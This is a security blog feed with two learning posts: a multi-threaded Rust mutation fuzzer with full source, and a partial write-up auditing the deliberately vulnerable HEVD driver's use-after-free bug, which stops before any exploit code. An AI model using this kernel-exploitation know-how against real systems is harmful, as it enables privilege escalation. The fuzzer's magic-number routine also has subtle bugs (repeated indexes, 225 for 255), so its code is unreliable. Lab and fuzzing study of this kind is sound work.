🔒
There are new articles available, click to refresh the page.
✇Decaff Hacking

Rusty-Fuzzer - A Multi-Threaded Mutation Fuzzer in Rust

By: Sophie Boyle

Rusty Fuzzer

Rusty fuzzer is a very simple mutation fuzzer written and multi-threaded with Rust. It was created for the purpose of learning.

Contents

Introduction


I wanted to learn fuzzing, and have also been learning Rust at University. I figured I would combine the both into a project. I’m also using this post as practice for writing blogs in the future.

This is very heavily based off of the blog-post/tutorial written by Hombre: Fuzzing Like a Caveman Part 1. The key differences is that my fuzzer is written in Rust, but also that the implementation uses Rust multi-threading. I won’t repeat everything that Hombre has already detailed very well in their own blog, but I will briefly summarise the key points, and then discuss the multi-threaded soup at the end.

Rusty_fuzzer gets it’s name from not only being written in Rust, but because nobody has probably used a fuzzer this simple in the field in over a decade. However, it’s a great learning opportunity.

Mutation Fuzzing


Mutation fuzzing is the act of making small changes (mutations) to the input to whatever binary we’re targeting.

Bit Flipping

The following functions constitute the bit-flipping mutation, where a given number of bytes in a file are randomly selected for a random bit to be flipped. select_indexes randomly selects the bytes of the byte array to be operated on using the rand crate. flip_bits enumerates the selected bytes, and flips a randomly-chosen bit using an XOR operation with a bit-shifted 0x1.

Note that it’s important to exclude the start of image and end of image magic bytes from the possible bits to be flipped. This is to avoid corrupting the input to the point where it gets (correctly) rejected by the target.

fn select_indexes(n_indexes : i32, n_selections: i32) -> Vec<i32>{
    // Excludes start of image and end of image markers from index range
    let index_range : Vec<i32> = (2..(n_indexes - 2)).collect();
    let mut selected_indexes = Vec::new();

    while selected_indexes.len() != n_selections as usize {
        let chosen_i = index_range.choose(&mut rand::thread_rng());
        match chosen_i {
            Some(i) => {
                selected_indexes.push(*i);
            },
            None => {
                panic!("Not enough indexes to choose given number of flips");
            }
        }
    }
    return selected_indexes;
}

fn flip_bits(mut bytes : Vec<u8>, byte_indexes : Vec<i32>) -> Vec<u8>{
    for i in byte_indexes{
        let index_range : Vec<i32> = (0..8).collect();
        let bit_i_opt = index_range.choose(&mut rand::thread_rng());
        match bit_i_opt {
            Some(bit_i) => {
                bytes[i as usize] ^= (1 as u8) << (*bit_i as u8);
            },
            None => {
                panic!("Could not randomly select bit index of chosen byte");
            }
        }
    }
    return bytes;
}

Gynvael’s Magic Numbers

GynvaelColdwind mentions some magic numbers which target data size and arithmetic errors.

0xFF
0x7F
0x00
0xFFFF
0x0000
0xFFFFFFFF
0x00000000
0x80000000
0x40000000
0x7FFFFFFF

As a second mutation technique, it’s possible to randomly choose a byte in the image to overwrite with any of the above. I implement this with the following functions.

fn get_magic_number() -> (i32, i32){
    // Format: (length in bytes, value of leading byte)
    let magic = [
        (1, 255),
        (1, 255),
        (1, 127),
        (1, 0),
        (2, 255),
        (2, 0),
        (4, 255),
        (4, 0),
        (4, 128),
        (4, 64),
        (4, 127)
    ];

    let magic_opt = magic.choose(&mut rand::thread_rng());
    match magic_opt{
        Some(num) => {
            return *num;
        },
        None => {
            panic!("Could not select magic number");
        }
    }
}

fn overwrite_with_magic(mut bytes : Vec<u8>, magic_n : (i32, i32)) -> Vec<u8>{
    match magic_n.0 {
        1 => {
            let indexes : Vec<i32> = (2..(bytes.len()) as i32 -2).collect();
            let index_opt = indexes.choose(&mut rand::thread_rng());
            match index_opt {
                Some(i) => {
                    bytes[*i as usize] = magic_n.1 as u8;
                },
                None => {
                    panic!("Cannot choose index");
                }
            }
        },
        2 => {
            let indexes : Vec<i32> = (2..(bytes.len()) as i32 -3).collect();
            let index_opt = indexes.choose(&mut rand::thread_rng());
            match index_opt {
                Some(i) => {
                    bytes[*i as usize] = magic_n.1 as u8;
                    bytes[(*i + 1) as usize] = magic_n.1 as u8;
                },
                None => {
                    panic!("Cannot choose index");
                }
            }
        },
        4 => {
            let indexes : Vec<i32> = (2..(bytes.len()) as i32 -6).collect();
            let index_opt = indexes.choose(&mut rand::thread_rng());
            match index_opt {
                Some(i) => {
                    match magic_n.1 {
                        255 => {
                            bytes[*i as usize] = 255;
                            bytes[(*i + 1) as usize] = 225;
                            bytes[(*i + 1) as usize] = 225;
                            bytes[(*i + 1) as usize] = 225;
                        },
                        0 => {
                            bytes[*i as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                        },
                        128 => {
                            bytes[*i as usize] = 128;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                        },
                        64 => {
                            bytes[*i as usize] = 64;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                        },
                        127 => {
                            bytes[*i as usize] = 127;
                            bytes[(*i + 1) as usize] = 255;
                            bytes[(*i + 1) as usize] = 255;
                            bytes[(*i + 1) as usize] = 255;
                        },
                        _ => {
                            panic!("Invalid magic byte {} {}", magic_n.0, magic_n.1);
                        }
                    }
                },
                None => {
                    panic!("Cannot choose index");
                }
            }
        },
        _ => {
            panic!("Invalid magic number length");
        }
    }
    return bytes;
}

Combining Mutation Techniques

The combined implementation is as follows. The code chooses between two mutation methods: bit flipping or overwriting bytes with magic numbers. It then performs either mutation, and writes a mutated output image.

fn main() {
    let args: Vec<String> = env::args().collect();

    if args.len() != 3 {
        println!("Usage: cargo run <jpg-path> <fuzzing-target-path");
        return;
    }

    let mut bytes = get_bytes(args[1].clone());

    // Randomly choose between bit-flipping or magic number mutation
    let options : Vec<i32> = (0..2).collect();
    match options.choose(&mut rand::thread_rng()){
        Some(0) => {
            // Only perform flips on 1% of bytes
            let n_flips = ((bytes.len() as i32) as f64 * 0.01).floor() as i32;
            let selected_i = select_indexes(bytes.len() as i32, n_flips);
            bytes = flip_bits(bytes, selected_i);
        },
        Some(1) => {
            let magic_n = get_magic_number();
            bytes = overwrite_with_magic(bytes, magic_n);
        },
        _ => {
            panic!("Could not choose between functions");
        }
    }

    write_jpg(bytes, String::from("output.jpg"));
}

Multi-Threading


This is where my implementation differs a bit from Hombre’s. Usually in fuzzing, you would want to write thousands of mutated inputs to the target script, increasing the chances of finding a crash and therefore increasing efficiency in finding bugs. I wanted to turn the simple fuzzer into a multi-threaded one, with several threads each creating hundreds of possible mutations.

I also wanted to combine the triage stage in a single script. This is the stage where the target script (in Hombre’s case and in this case, the exif data parsing binary at https://github.com/mkttanabe/exif, is run numerous times against different mutated inputs.

Distributing Mutation Across Multiple Threads

The implementation for the mutating threads is below. In rust, it’s possible to spawn a thread using the std::thread library, via thread::spawn. It’s also important to pay attention to Rust’s ownership rules. The outer for loop spawns 20 threads. It also ensures to clone the index and the bytes read from the original image.

Recall that each thread must actually mutate the vector of bytes (by flipping bits or overwriting entire bytes). This requires a mutable reference. However, Rust does not allow multiple mutable references to the same data. This prevents race conditions among threads by ensuring that multiple threads cannot edit the same data at the same time, and is enforced by the compiler.

Therefore instead, we create a clone of the bytes vector. Additionally, we want to move ownership of the cloned vector of bytes into the thread, instead of borrowing, such that the cloned vector of bytes now exists within the thread’s scope. This is because the thread may outlive the scope of the loop. When the loop’s scope closes, the variables defined within it are destroyed. This is why the move is necessary.

Additionally, within the thread, we have an additional loop which repeats 500 times, producing 500 mutations for each of the 20 threads. Note that it’s necessary to maintain a cloned copy of the original bytes, so that the stream of bytes can be reset to the original following each mutation to avoid chaining the mutations.

// Spawn 20 threads, each of which will create a mutated image 500 times
for i in 0..20{
    let mut bytes_clone = bytes.clone();
    let i_clone = i.clone();
    thread::spawn(move || {
        let original_bytes = bytes_clone.clone();
        for j in 0..500{
            bytes_clone = original_bytes.clone();
            // Randomly choose between bit-flipping or magic number mutation
            let options : Vec<i32> = (0..2).collect();
            match options.choose(&mut rand::thread_rng()){
                Some(0) => {
                    // Only perform flips on 1% of bytes
                    let n_flips = ((bytes_clone.len() as i32) as f64 * 0.01).floor() as i32;
                    let selected_i = select_indexes(bytes_clone.len() as i32, n_flips);
                    bytes_clone = flip_bits(bytes_clone, selected_i);
                },
                Some(1) => {
                    let magic_n = get_magic_number();
                    bytes_clone = overwrite_with_magic(bytes_clone, magic_n);
                },
                _ => {
                    panic!("Could not choose between functions");
                }
            }
            let filename = String::from(format!("output/{}-{}-output.jpg", i_clone, j));
            write_jpg(bytes_clone, filename.clone());
        }
    });
}

The Triage Phase

Now we want to create a thread that tests the target script against a queue of mutated jpegs. There are some slight changes that need to be made. For example, we need to get the target script as input for one.

let target_script = args[2].clone();

We want to structure the program as a pipeline, where there are 20 threads each performing 500 mutations, but also another separate thread testing the target script on mutated jpegs at the same time. We need a way for the mutating threads to notify the triage thread when they have written a mutated jpeg to disk, such that the triage thread can run the target script on said mutated jpeg.

We can use Rust channels to do exactly that. There is one channel connecting all mutation threads with the triage thread. Each mutation thread has a clone of the sender endpoint, so that all of them are able to notify the triage thread. The triage thread has ownership of the only receiving endpoint, and reads notifications from the channel like a queue.

The notification itself will simply be the string filename of the output jpeg that the thread has just written.

It is possible to define the channel endpoints using the std::sync::mpsc library as follows:

let (sender, reciever) = channel();

The mutation threads become redefined slightly, so that the sender endpoint is cloned and moved into each thread. Also, after writing the jpeg, the cloned sender endpoint sends the filename. There is also some error checking code.

// Spawn 20 threads, each of which will create a mutated image 500 times
for i in 0..20{
    let mut bytes_clone = bytes.clone();
    let i_clone = i.clone();
    let sender_clone = sender.clone();
    thread::spawn(move || {
        let original_bytes = bytes_clone.clone();
        for j in 0..500{
            bytes_clone = original_bytes.clone();
            // Randomly choose between bit-flipping or magic number mutation
            let options : Vec<i32> = (0..2).collect();
            match options.choose(&mut rand::thread_rng()){
                Some(0) => {
                    // Only perform flips on 1% of bytes
                    let n_flips = ((bytes_clone.len() as i32) as f64 * 0.01).floor() as i32;
                    let selected_i = select_indexes(bytes_clone.len() as i32, n_flips);
                    bytes_clone = flip_bits(bytes_clone, selected_i);
                },
                Some(1) => {
                    let magic_n = get_magic_number();
                    bytes_clone = overwrite_with_magic(bytes_clone, magic_n);
                },
                _ => {
                    panic!("Could not choose between functions");
                }
            }
            let filename = String::from(format!("output/{}-{}-output.jpg", i_clone, j));
            write_jpg(bytes_clone, filename.clone());
            let res = sender_clone.send(filename.clone());
            match res {
                Ok(_) => {
                    continue;
                },
                Err(e) => {
                    panic!("Error sending {} to triage thread: {}", filename, e);
                }
            }
        }
    });
}

The triage thread is defined below. It loops 10000 times (20 * 500), to ensure that it collects the correct number of files to collect from the channel before quitting. At each iteration, it takes a path to a mutated jpeg from the channel (sent by a mutation thread), constructs a shell command with the given target_script path (provided earlier), runs the command and checks the status code.

// Triage thread
let triage_thread = thread::spawn(move || {
    for i in 0..10000 {
        let filename = reciever.recv().unwrap();
        let mut cmd = Command::new(&target_script);
        let cmd_output = cmd.arg(&filename).stdout(Stdio::piped());
        match cmd_output.status() {
            Ok(status) => {
                match status.code() {
                    None => {
                        println!("Process terminated by signal: {}", filename);
                    },
                    _ => {
                        continue;
                    }
                }
            },
            Err(e) => {
                println!("Could not get status for {}: {}", filename, e);
            }
        }
    }
});

The documentation of the code() method on ExitStatus (returned by matching the Result of cmd_output.status()) states that “On Unix, this will return None if the process was terminated by a signal.” Therefore, we match for None to print out the filenames of mutated jpegs that caused the target script to quit according to a signal, which is very likely to be a Segmentation Fault.

Conclusion


This was a fun project that allowed me to try fuzzing for the first time, and also practice multi-threading with channels in Rust. I notice that there’s probably a few problems, especially with the error handling in the mutated threads (the triage thread is expecting 10000 filenames from the channel, but if a mutation thread fails to send a filename, it will panic and therefore destroy the thread, but the other threads will continue, and the triage thread will wait forever).

It would be interesting to pick a different target too, since I used the same target that Hombre used in their own blog. I’d like to look at code coverage and smart fuzzing techniques in the future as well. Thanks again to Hombre for their really well-written blog that helped me access fuzzing as a beginner.

Anyway, the source code can be found below and on github

Source Code


use std::env;
use std::fs::{File, read};
use std::io::Write;
use rand::seq::{SliceRandom};
use std::thread;
use std::sync::mpsc::channel;
use std::process::{Command, Stdio};

fn get_bytes(filename : String) -> Vec<u8>{
    let bytes_vector = read(filename).unwrap();
    return bytes_vector;
}

fn write_jpg(data : Vec<u8>, filename : String){
    let mut f = File::create(filename).unwrap();
    f.write_all(&data).unwrap();
}

fn select_indexes(n_indexes : i32, n_selections: i32) -> Vec<i32>{
    // Excludes start of image and end of image markers from index range
    let index_range : Vec<i32> = (2..(n_indexes - 2)).collect();
    let mut selected_indexes = Vec::new();

    while selected_indexes.len() != n_selections as usize {
        let chosen_i = index_range.choose(&mut rand::thread_rng());
        match chosen_i {
            Some(i) => {
                selected_indexes.push(*i);
            },
            None => {
                panic!("Not enough indexes to choose given number of flips");
            }
        }
    }
    return selected_indexes;
}

fn flip_bits(mut bytes : Vec<u8>, byte_indexes : Vec<i32>) -> Vec<u8>{
    for i in byte_indexes{
        // println!("{:#010b}", bytes[i as usize]);
        let index_range : Vec<i32> = (0..8).collect();
        let bit_i_opt = index_range.choose(&mut rand::thread_rng());
        match bit_i_opt {
            Some(bit_i) => {
                bytes[i as usize] ^= (1 as u8) << (*bit_i as u8);
            },
            None => {
                panic!("Could not randomly select bit index of chosen byte");
            }
        }
        // println!("{:#010b}", bytes[i as usize]);
    }
    return bytes;
}

fn get_magic_number() -> (i32, i32){
    // Format: (length in bytes, value of leading byte)
    let magic = [
        (1, 255),
        (1, 255),
        (1, 127),
        (1, 0),
        (2, 255),
        (2, 0),
        (4, 255),
        (4, 0),
        (4, 128),
        (4, 64),
        (4, 127)
    ];

    let magic_opt = magic.choose(&mut rand::thread_rng());
    match magic_opt{
        Some(num) => {
            return *num;
        },
        None => {
            panic!("Could not select magic number");
        }
    }
}

fn overwrite_with_magic(mut bytes : Vec<u8>, magic_n : (i32, i32)) -> Vec<u8>{
    match magic_n.0 {
        1 => {
            let indexes : Vec<i32> = (2..(bytes.len()) as i32 -2).collect();
            let index_opt = indexes.choose(&mut rand::thread_rng());
            match index_opt {
                Some(i) => {
                    bytes[*i as usize] = magic_n.1 as u8;
                },
                None => {
                    panic!("Cannot choose index");
                }
            }
        },
        2 => {
            let indexes : Vec<i32> = (2..(bytes.len()) as i32 -3).collect();
            let index_opt = indexes.choose(&mut rand::thread_rng());
            match index_opt {
                Some(i) => {
                    bytes[*i as usize] = magic_n.1 as u8;
                    bytes[(*i + 1) as usize] = magic_n.1 as u8;
                },
                None => {
                    panic!("Cannot choose index");
                }
            }
        },
        4 => {
            let indexes : Vec<i32> = (2..(bytes.len()) as i32 -6).collect();
            let index_opt = indexes.choose(&mut rand::thread_rng());
            match index_opt {
                Some(i) => {
                    match magic_n.1 {
                        255 => {
                            bytes[*i as usize] = 255;
                            bytes[(*i + 1) as usize] = 225;
                            bytes[(*i + 1) as usize] = 225;
                            bytes[(*i + 1) as usize] = 225;
                        },
                        0 => {
                            bytes[*i as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                        },
                        128 => {
                            bytes[*i as usize] = 128;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                        },
                        64 => {
                            bytes[*i as usize] = 64;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                            bytes[(*i + 1) as usize] = 0;
                        },
                        127 => {
                            bytes[*i as usize] = 127;
                            bytes[(*i + 1) as usize] = 255;
                            bytes[(*i + 1) as usize] = 255;
                            bytes[(*i + 1) as usize] = 255;
                        },
                        _ => {
                            panic!("Invalid magic byte {} {}", magic_n.0, magic_n.1);
                        }
                    }
                },
                None => {
                    panic!("Cannot choose index");
                }
            }
        },
        _ => {
            panic!("Invalid magic number length");
        }
    }
    return bytes;
}

fn main() {
    let args: Vec<String> = env::args().collect();

    if args.len() != 3 {
        println!("Usage: cargo run <jpg-path> <fuzzing-target-path");
        return;
    }

    let bytes = get_bytes(args[1].clone());
    let target_script = args[2].clone();

    let (sender, reciever) = channel();

    // Spawn 20 threads, each of which will create a mutated image 500 times
    for i in 0..20{
        let mut bytes_clone = bytes.clone();
        let i_clone = i.clone();
        let sender_clone = sender.clone();
        thread::spawn(move || {
            let original_bytes = bytes_clone.clone();
            for j in 0..500{
                bytes_clone = original_bytes.clone();
                // Randomly choose between bit-flipping or magic number mutation
                let options : Vec<i32> = (0..2).collect();
                match options.choose(&mut rand::thread_rng()){
                    Some(0) => {
                        // Only perform flips on 1% of bytes
                        let n_flips = ((bytes_clone.len() as i32) as f64 * 0.01).floor() as i32;
                        let selected_i = select_indexes(bytes_clone.len() as i32, n_flips);
                        bytes_clone = flip_bits(bytes_clone, selected_i);
                    },
                    Some(1) => {
                        let magic_n = get_magic_number();
                        bytes_clone = overwrite_with_magic(bytes_clone, magic_n);
                    },
                    _ => {
                        panic!("Could not choose between functions");
                    }
                }
                let filename = String::from(format!("output/{}-{}-output.jpg", i_clone, j));
                write_jpg(bytes_clone, filename.clone());
                let res = sender_clone.send(filename.clone());
                match res {
                    Ok(_) => {
                        continue;
                    },
                    Err(e) => {
                        panic!("Error sending {} to triage thread: {}", filename, e);
                    }
                }
            }
        });
    }

    // Triage thread
    let triage_thread = thread::spawn(move || {
        for i in 0..10000 {
            let filename = reciever.recv().unwrap();
            // let cmd = String::from(format!("{} {}", target_script, filename));
            let mut cmd = Command::new(&target_script);
            let cmd_output = cmd.arg(&filename).stdout(Stdio::piped());
            match cmd_output.status() {
                Ok(status) => {
                    match status.code() {
                        None => {
                            println!("Process terminated by signal: {}", filename);
                        },
                        _ => {
                            continue;
                        }
                    }
                },
                Err(e) => {
                    println!("Could not get status for {}: {}", filename, e);
                }
            }
        }
    });

    triage_thread.join().unwrap();
}
✇Decaff Hacking

Use-After-Free Exploit in HackSysExtremeVulnerableDriver

By: Sophie Boyle

HEVD UAF Exploit Development Writeup

Hi! This is my write-up for the Use After Free vulnerability in the purposefully-vulnerable windows driver HackSysExtremeVulnerableDriver by hacksysteam. I will go over how to find the vulnerability by auditing the source code, how to exploit the vulnerability, and how to write the exploit code. However, I will not be going through the debugging lab setup. I used hasherzade’s posts (1, 2) on the lab setup, and I strongly encourage anyone who is having trouble setting up their lab to read them (or watch the videos)!

This is the first time I’ve ever exploited a UAF vulnerability. It was also the first time I’ve exploited anything on windows, and the first time I’ve interacted with the windows API. I have also never really looked at driver code before, so reading the source code has been a valuable experience. On top of that, I had never done any of the more complex exploitation steps such as spraying memory. With all of that in mind, please let me know if you find that there’s something incorrect anywhere in this post. Hopefully my newcomer-ness to this challenge will let me add some notes on things that I found particularly challenging as a beginner.

I must also add that there are already some great write-ups for this challenge that I referred to whenever I got stuck. @tekwizz123 has a fully commented UAF exploit on their github, which I found really useful for understanding how to write parts of the exploit. Also, @h0mbre_ has written a great writeup which takes a reverse engineering approach when figuring out how to exploit the UAF before continuing to explain how to write the exploit itself. These resources were really helpful to me, and I highly recommend them.

(Note that I am using HEVD 2.0. My lab setup also consisted of 2 windows 7 x86 VMs, a debugger and a debugee.)

Contents

Source Code Audit

There are two ways to understand a windows driver: source code auditing or reverse engineering. For this challenge, I opted for looking at the source code. It’s easier to read source code with a good start-point in mind which relates to the functionality we need. First, we need to look for the method of communication between a userland process (our cmd.exe, probably) and the windows driver.

I/O Control Codes (IOCTLs) are used as the method of communication between userland and drivers. IOCTLs are sent via I/O Request Packets (IRPs). Note that the documentation states that:

User-mode applications send IOCTLs to drivers by calling DeviceIoControl, which is described in Microsoft Windows SDK documentation. Calls to DeviceIoControl cause the I/O manager to create an IRP_MJ_DEVICE_CONTROL request and send it to the topmost driver.

Therefore, we can search the code for any handler of the IRP_MJ_DEVICE_CONTROL request.

// HackSysExtremeVulnerableDriver.c
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = IrpDeviceIoCtlHandler;

We can see that the request will be handled by the IrpDeviceIoCtlHandler function.

// HackSysExtremeVulnerableDriver.c
NTSTATUS IrpDeviceIoCtlHandler(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) {
    ULONG IoControlCode = 0;
    PIO_STACK_LOCATION IrpSp = NULL;
    NTSTATUS Status = STATUS_NOT_SUPPORTED;

    UNREFERENCED_PARAMETER(DeviceObject);
    PAGED_CODE();

    IrpSp = IoGetCurrentIrpStackLocation(Irp);
    IoControlCode = IrpSp->Parameters.DeviceIoControl.IoControlCode;

    if (IrpSp) {
        switch (IoControlCode) {
            case HACKSYS_EVD_IOCTL_STACK_OVERFLOW:
                DbgPrint("****** HACKSYS_EVD_STACKOVERFLOW ******\n");
                Status = StackOverflowIoctlHandler(Irp, IrpSp);
                DbgPrint("****** HACKSYS_EVD_STACKOVERFLOW ******\n");
                break;
            case HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS:
                DbgPrint("****** HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS ******\n");
                Status = StackOverflowGSIoctlHandler(Irp, IrpSp);
                DbgPrint("****** HACKSYS_EVD_IOCTL_STACK_OVERFLOW_GS ******\n");
                break;
// The switch statement continues ...

The code gets a pointer to the I/O stack location of the Irp, and from that, gets the associated IOCTL. It then calls a different function depending on which code was used. The codes are named after the different types of vulnerabilities embedded in the driver. Since we’re looking to exploit the UAF vulnerability, we can skip to the following code:

// HackSysExtremeVulnerableDriver.c
            case HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT:
                DbgPrint("****** HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT ******\n");
                Status = AllocateUaFObjectIoctlHandler(Irp, IrpSp);
                DbgPrint("****** HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT ******\n");
                break;
            case HACKSYS_EVD_IOCTL_USE_UAF_OBJECT:
                DbgPrint("****** HACKSYS_EVD_IOCTL_USE_UAF_OBJECT ******\n");
                Status = UseUaFObjectIoctlHandler(Irp, IrpSp);
                DbgPrint("****** HACKSYS_EVD_IOCTL_USE_UAF_OBJECT ******\n");
                break;
            case HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT:
                DbgPrint("****** HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT ******\n");
                Status = FreeUaFObjectIoctlHandler(Irp, IrpSp);
                DbgPrint("****** HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT ******\n");
                break;
            case HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT:
                DbgPrint("****** HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT ******\n");
                Status = AllocateFakeObjectIoctlHandler(Irp, IrpSp);
                DbgPrint("****** HACKSYS_EVD_IOCTL_ALLOCATE_FAKE_OBJECT ******\n");
                break;

All of the above functions can be found in UseAfterFree.c. First, checking how the “UAF Object” is allocated:

// UseAfterFree.c
PUSE_AFTER_FREE g_UseAfterFreeObject = NULL;

// ...

NTSTATUS AllocateUaFObject() {
    NTSTATUS Status = STATUS_SUCCESS;
    PUSE_AFTER_FREE UseAfterFree = NULL;

    PAGED_CODE();

    __try {
        DbgPrint("[+] Allocating UaF Object\n");

        // Allocate Pool chunk
        UseAfterFree = (PUSE_AFTER_FREE)ExAllocatePoolWithTag(NonPagedPool,
                                                              sizeof(USE_AFTER_FREE),
                                                              (ULONG)POOL_TAG);

        if (!UseAfterFree) {
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(USE_AFTER_FREE));
            DbgPrint("[+] Pool Chunk: 0x%p\n", UseAfterFree);
        }

        // Fill the buffer with ASCII 'A'
        RtlFillMemory((PVOID)UseAfterFree->Buffer, sizeof(UseAfterFree->Buffer), 0x41);

        // Null terminate the char buffer
        UseAfterFree->Buffer[sizeof(UseAfterFree->Buffer) - 1] = '\0';

        // Set the object Callback function
        UseAfterFree->Callback = &UaFObjectCallback;

        // Assign the address of UseAfterFree to a global variable
        g_UseAfterFreeObject = UseAfterFree;

        DbgPrint("[+] UseAfterFree Object: 0x%p\n", UseAfterFree);
        DbgPrint("[+] g_UseAfterFreeObject: 0x%p\n", g_UseAfterFreeObject);
        DbgPrint("[+] UseAfterFree->Callback: 0x%p\n", UseAfterFree->Callback);
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

The important parts to note is how the memory is allocated, what capabilities the object has, and the object’s scope (when the variable will destroyed). The memory for the UAF object is allocated on the nonpaged pool. The object is of type PUSE_AFTER_FREE, which we can check UseAfterFree.h for the definition of in a moment. Finally, the object is assigned to the global variable g_UseAfterFree, meaning that the pointer to the object will not be destroyed once the function goes out of scope.

Checking the header file for a definition of PUSE_AFTER_FREE gives the following:

// UseAfterFree.h
    typedef struct _USE_AFTER_FREE {
        FunctionPointer Callback;
        CHAR Buffer[0x54];
    } USE_AFTER_FREE, *PUSE_AFTER_FREE;

    typedef struct _FAKE_OBJECT {
        CHAR Buffer[0x58];
    } FAKE_OBJECT, *PFAKE_OBJECT;

Note that we also need the FunctionPointer defintion from Common.h (even if it is fairly self explanatory).

// Common.h
typedef void (*FunctionPointer)();

PUSE_AFTER_FREE is a pointer to a USE_AFTER_FREE struct, which contains a function pointer Callback and a 0x54 long character buffer. The function pointer is interesting and should be noted for now. How is the object actually used?

// UseAfterFree.c
NTSTATUS UseUaFObject() {
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    PAGED_CODE();

    __try {
        if (g_UseAfterFreeObject) {
            DbgPrint("[+] Using UaF Object\n");
            DbgPrint("[+] g_UseAfterFreeObject: 0x%p\n", g_UseAfterFreeObject);
            DbgPrint("[+] g_UseAfterFreeObject->Callback: 0x%p\n", g_UseAfterFreeObject->Callback);
            DbgPrint("[+] Calling Callback\n");

            if (g_UseAfterFreeObject->Callback) {
                g_UseAfterFreeObject->Callback();
            }

            Status = STATUS_SUCCESS;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

We can see that the UseUaFObject function simply calls the function pointed to by the function pointer Callback! This is super useful. Is it possible for us to replace the function pointer Callback with our own function somehow?

Before that, a quick aside on what a UAF is: A use after free vulnerability is the result of a dangling pointer, where the pointer to an object is freed (deallocating the memory to be re-used elsewhere in the program), but the pointer is then used again later. Since the memory has been freed, different data may be written to the object’s memory location. When the pointer is used later, malicious data may have replaced the previous object from since it was freed, without the program being aware.

Knowing that, we can now check the way by which the “UAF Object” is freed.

// UseAfterFree.c
NTSTATUS FreeUaFObject() {
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    PAGED_CODE();

    __try {
        if (g_UseAfterFreeObject) {
            DbgPrint("[+] Freeing UaF Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", g_UseAfterFreeObject);

#ifdef SECURE
            // Secure Note: This is secure because the developer is setting
            // 'g_UseAfterFreeObject' to NULL once the Pool chunk is being freed
            ExFreePoolWithTag((PVOID)g_UseAfterFreeObject, (ULONG)POOL_TAG);

            g_UseAfterFreeObject = NULL;
#else
            // Vulnerability Note: This is a vanilla Use After Free vulnerability
            // because the developer is not setting 'g_UseAfterFreeObject' to NULL.
            // Hence, g_UseAfterFreeObject still holds the reference to stale pointer
            // (dangling pointer)
            ExFreePoolWithTag((PVOID)g_UseAfterFreeObject, (ULONG)POOL_TAG);
#endif

            Status = STATUS_SUCCESS;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

Here, the memory is freed using ExFreePoolWithTag. However, as the HEVD developers have mentioned in the above code, the pointer g_UseAfterFreeObject still exists. The reference to that freed memory location still exists, meaning that it’s still possible for the program to attempt to access that memory, even though the data at that memory location is free to be changed by another program.

Therefore, the plan of action is:

  • Allocate the UAF Object
  • Free the UAF Object
  • Somehow replace the function pointer at the exact memory address at which the UAF Object was allocated
  • Use the UAF Object

What do we use to replace the UAF object at the target memory address after it is freed? UseAfterFree.c also contains a function which allocates a “fake object”.

// UseAfterFree.c
NTSTATUS AllocateFakeObject(IN PFAKE_OBJECT UserFakeObject) {
    NTSTATUS Status = STATUS_SUCCESS;
    PFAKE_OBJECT KernelFakeObject = NULL;

    PAGED_CODE();

    __try {
        DbgPrint("[+] Creating Fake Object\n");

        // Allocate Pool chunk
        KernelFakeObject = (PFAKE_OBJECT)ExAllocatePoolWithTag(NonPagedPool,
                                                               sizeof(FAKE_OBJECT),
                                                               (ULONG)POOL_TAG);

        if (!KernelFakeObject) {
            // Unable to allocate Pool chunk
            DbgPrint("[-] Unable to allocate Pool chunk\n");

            Status = STATUS_NO_MEMORY;
            return Status;
        }
        else {
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Type: %s\n", STRINGIFY(NonPagedPool));
            DbgPrint("[+] Pool Size: 0x%X\n", sizeof(FAKE_OBJECT));
            DbgPrint("[+] Pool Chunk: 0x%p\n", KernelFakeObject);
        }

        // Verify if the buffer resides in user mode
        ProbeForRead((PVOID)UserFakeObject, sizeof(FAKE_OBJECT), (ULONG)__alignof(FAKE_OBJECT));

        // Copy the Fake structure to Pool chunk
        RtlCopyMemory((PVOID)KernelFakeObject, (PVOID)UserFakeObject, sizeof(FAKE_OBJECT));

        // Null terminate the char buffer
        KernelFakeObject->Buffer[sizeof(KernelFakeObject->Buffer) - 1] = '\0';

